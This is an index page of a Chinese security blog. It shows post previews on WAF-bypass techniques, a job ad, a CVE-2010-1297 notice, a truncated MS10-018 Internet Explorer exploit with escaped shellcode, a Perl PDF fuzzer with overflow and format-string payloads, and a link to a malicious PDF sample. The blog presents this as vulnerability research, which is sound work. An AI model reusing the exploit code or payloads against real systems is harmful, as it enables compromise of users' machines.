欢迎信息安全界的朋友!黑站、挂马的勿扰!只做基础理论研究。交流IDS、IPS、buffer overflow、内核编程 、sniffer,技术共享!

                                                 
              .                 .    . . .                  
             .                        .        .            
         'BBNNNN                        .  .                
          N                      .       .     .            
         N                         .   .   .                
         N.  .                        .                     
        N  .   .                  .  N   .  NN              
        B   .                       NN.     NN              
       NN                  .  .     BN      NN              
       N .  . .           .      .  ND.     NN              
       N. .                ..  .    NN .    NN              
       N    ..                   .  NB      NN              
       N                 B. .       NN.     NN                    
       N  .               NN        NB .    NN              
       NNNBNNNN            B     .  N.      NN            
       N  .                        .N       NN              
 .     N                 .          N.      NN              
      .N   .            .   .    .  N  .  . BN  ..          
  ..  .B .   .     ..     .       . N       NN     .  .     
       N       NNN.  B.    .  .     N   NNNNNN NNN          
    .. N       N N  N  .NNNB    NNN.B. BN. NBN   B. B.      
      .B .   .   N NN . N N  . NB NBN .N    NN   N  N  .    
     .NN   .    N NN   .  B   .B .  N  N. . B    N.BN.      
  .   N         N N  .    NN   N  ..B. N .  N   .B NN       
      N         NN       NNN   N  NNN  N   NB   NNNN        
  . . B.        BN       NN  .  NNN NN NNNNNN. .NB N  .     
      N         N  . .              . . NN . N.  . N        
   .  N          .                        . .  .  .B   .    
    . D.        .    .      .    .     .      .    N.       
      N          .      .  '    .            .     N  .     
      N          .  .     .       .       .        N  .     
  .             .               .             .   NN .      
                                    . .           N   .     
                                  .        .   .  N .       
                                         .  .     N. ..     
                                    .     .      NN    .    
                                .     . .    NNBNB. '       
                                 . .  BNBNNNNN         .    
                                . .   . . .           .     
                                 .    .      .                                                                                                                

预览模式: 普通 | 列表

老外绕过WAF过滤的方法,很值得参考

##########
Contents
##########

  [0x00] - Introduction

  [0x01] - Filter Evasion (Mysql)

[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering

  [0x02] - Normally Bypassing Techniques

  [0x03] - Advanced Bypassing Techniques

[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination
 
  [0x04] - How to protect your website

  [0x05] - Conclusion

  [0x06] - References

  [0x07] - Greetz To

 

查看更多...

分类:反黑客日记 | 固定链接 | 评论: 51 | 引用: 0 | 查看次数: 47734

南京铱迅招聘网络安全工程师

公司网站:www.yxlink.com
 
学历要求:
学历不限,铱迅安全团队,看重的是你的能力。
 
提供职位:
1、 网络安全工程师
2、 网络安全助理工程师
 
招聘要求:
1.       理解Web漏洞基本原理,如SQL injection、XSS等
2.       能够使用ASP、PHP、ASP.net、JSP中,至少一种语言编写Web程序
3.       有过网络渗透测试方面的经历
注:能够满足以上3条者,可应聘网络安全工程师。满足以上1-2条者,可应聘网络安全助理工程师。
 
工作内容:
1.       完善公司攻击特征库、防御特征库、恶意代码库
2.       为政府、教育、金融、运营商、网络游戏等提供安全咨询、代码审计、渗透测试、安全演练等服务
3.       安全产品开发工作
注:工作内容为以上内容1-3条

查看更多...

Tags: 铱迅 铱迅招聘

分类:水谭 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 11247

铱迅“Web应用防火墙”在线演示设备

demo设备地址: https://demo.yxlink.com
demo 演示用户名: demo
demo 演示密码  : 123456




查看更多...

分类:反黑客日记 | 固定链接 | 评论: 11 | 引用: 0 | 查看次数: 10674

CVE-2010-1297那个Adobe洞的内幕

Adobe近日发布了一个安全公告,称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞,该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统,Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案,但Flash Player 10.1 Release Candidate不受此漏洞影响,用户可下载使用或采取以下临时解决方案,以避免受到漏洞威胁。

查看更多...

分类:漏洞公告 | 固定链接 | 评论: 14 | 引用: 0 | 查看次数: 18448

恩。。。。。

分类:水谭 | 固定链接 | 评论: 8 | 引用: 0 | 查看次数: 13460

MS IE MS10018 Exploit Published

Title : Microsoft Internet Explorer Code Execution Vulnerabilities (MS10-018)
VUPEN ID : VUPEN/ADV-2010-0744
CVE ID : CVE-2010-0267 - CVE-2010-0488 - CVE-2010-0489 - CVE-2010-0490 - CVE-2010-0491 - CVE-2010-0492 - CVE-2010-0494 - CVE-2010-0805 - CVE-2010-0806 - CVE-2010-0807
 

/*ms10018 Exploit*/

<html><body>
<script>
var cn = new Array();
var shellcode = unescape( '%uf946%u41fd%u9f4f%uf83f%u4a4e%ufc9b%u9b27%u9f42%u48f5%u4e9b%u46fc%u994f%u4f9f%ufc4f%u9892%u46fc%u99f5%u463f%u9293%u4afc%u4043%ud693%u9242%ud64f%u9643%u484f%u9743%u27f8%u27d6%u4347%u2791%uf948%u4a91%u9b9f%u37fc%

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 13593

PDF File Standard Fuzzer

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# PDF FUZZER -- TAKE IT TO THE HEAD
# :) HAVE FUN :)

use PDF::Create;
use Getopt::Std;

@overflow = ('A' x 8200, 'A' x 11000, 'A' x 110000, 'A' x 550000, 'A' x 1100000, 'A' x 2200000, 'A' x 12000000, "\0x99" x 1200, "//AAAA" x 250, "\\AAAA" x 250);

@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",
 

查看更多...

分类:漏洞挖掘 | 固定链接 | 评论: 34 | 引用: 0 | 查看次数: 15823

Adobe Reader 《=9.3.0 TIFF 漏洞

样本:

下载文件 点击下载此文件

打开后pop up MessageBox

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 5 | 引用: 0 | 查看次数: 11771